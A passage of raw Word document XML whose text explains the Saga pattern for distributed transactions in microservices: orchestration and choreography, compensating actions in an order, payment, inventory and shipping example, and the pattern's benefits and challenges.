        </w:rPr>
        <w:t>: A payment service will be called, followed by an inventory service, and then a shipment service. If the payment fails, the orchestrator triggers compensation for all previous steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C15854B" w14:textId="77777777" w:rsidR="00D056EB"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B33E83E">
          <v:rect id="_x0000_i2814" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A7817C"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How the Saga Pattern Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151F59FA"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1. Initiating the Saga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECB7CD2"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A request is received from a user (e.g., placing an order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F807C8D"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The saga orchestrator (if orchestration-based) or the initiating service (in choreography-based) begins the distributed transaction by invoking the first service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F36F53A"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2. Executing the Saga Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6AA144"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Each service involved in the saga performs its part of the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B97676"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After each step, the service either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61024EA7"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Commits</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the transaction is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309048F1"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Rollbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or initiates a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compensating transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the step fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4B0B16"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3. Compensating Transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF5140D"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If a service fails at any point in the saga, the previously completed services must be compensated to revert the state to what it was before the saga started. These are called </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compensating actions</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240EEE06"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For example, if the payment service completes successfully but the shipping service fails, the compensating action would be to cancel the payment or refund the payment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCE119A" w14:textId="77777777" w:rsidR="00D056EB"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1615583">
          <v:rect id="_x0000_i2815" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B862E57"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Saga Orchestrator vs. Choreography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ACA0F0"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Orchestrator-based Saga</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA6EF28"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A single service (orchestrator) manages the execution of the entire saga, calls the steps in order, and invokes compensating transactions when needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41318E73"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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Centralized control over the process. Easier to implement and trace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25329F1B"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Disadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The orchestrator can become a bottleneck, and the flow is tightly coupled to this central service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220E93AB"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Choreography-based Saga</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2443DE31"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ervices communicate with each other through events, and each service knows when to act or compensate based on the state of the saga.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAFB3D3"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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Decentralized, with no single point of failure, reducing bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21927E12"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Disadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: More complex event-driven communication, harder to manage and trace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFB38E8" w14:textId="77777777" w:rsidR="00D056EB"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1A44E6">
          <v:rect id="_x0000_i2816" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC2D0E2"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Use Case Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD43536"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Consider an </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Order Management System</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the following microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A1A8D"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Order Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Handles order creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA98D6E"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Payment Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Processes payment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA398B0"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Inventory Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages inventory stock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B258F13"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Shipping Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages shipping of the product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEE9E8C"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Steps in a Saga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F45481D"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Step 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Create Order</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC3F8C"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Order Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> receives the order and creates an entry in its database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554ED4D8"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Step 2</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Process Payment</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C484D64"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Payment Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processes the payment. If payment fails, a compensating action (like cancelling the order) is triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCDD6E3"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Step 3</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reserve Inventory</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB988F9"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inventory Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reserves the stock. If it fails, the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Payment Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is notified to refund the payment (compensating action).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC88F60"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Step 4</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ship the Product</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78312452"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Shipping Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> initiates shipment. If it fails, the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inventory Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is notified to release the reserved stock, and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Payment Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is notified to refund the payment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104B64D0"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Compensating Transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37673F54"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If at any step, the process fails (e.g., payment fails), the saga orchestrator or the services will initiate compensating actions like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF54319"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Canceling the order</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721BD7CB"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Refunding the payment</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31326C0D"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Releasing the reserved inventory</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7667F860"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This ensures that the system does not end in an inconsistent state (e.g., inventory being reserved without payment or shipment without inventory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB069EC" w14:textId="77777777" w:rsidR="00D056EB"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0D2223E">
          <v:rect id="_x0000_i2817" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC3DB4"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Benefits of Using the Saga Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7337FA5B"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Distributed Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458C5857"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Handles complex transactions across multiple services in a microservices architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3425CF02"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Decouples Services</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29834B8E"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Each service only handles its own part of the business logic and compensating actions, improving service autonomy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF65988"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Scalability and Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D5932C"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agas allow services to scale independently without worrying about the global consistency across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797BAD83"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Event-Driven Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC7314"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The pattern supports asynchronous communication, making it suitable for event-driven architectures that improve performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109793D2" w14:textId="77777777" w:rsidR="00D056EB"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787393">
          <v:rect id="_x0000_i2818" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="220E92B1"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Challenges of Using the Saga Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E5B02"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Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9612E0"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Implementing the saga pattern adds complexity to the system as services need to handle compensating actions, monitor saga status, and ensure data consistency across distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075EE93B"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Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F262558"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Handling errors across multiple services can be tricky, especially in an asynchronous environment, making it difficult to maintain the transaction state and handle failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5573818D"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Eventual Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3DDD3B"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The saga pattern relies on eventual consistency, which may not be suitable for systems requiring strong consistency or atomic operations across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D0690"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Tracking State</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED18BE4"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You need to track the state of the saga and determine whether it has been completed successfully or if compensating actions need to be triggered. This can be tricky, especially in a distributed system with multiple events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F091E7" w14:textId="77777777" w:rsidR="00D056EB"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FF69A15">
          <v:rect id="_x0000_i2819" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="431A3039"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How to Implement Sagas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB8C45C"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Use Event-Driven Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use event-based communication (via messaging queues like Kafka, RabbitMQ, etc.) between services to drive saga execution in a choreography-based approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7151EC77"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Use a Saga Orchestrator</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
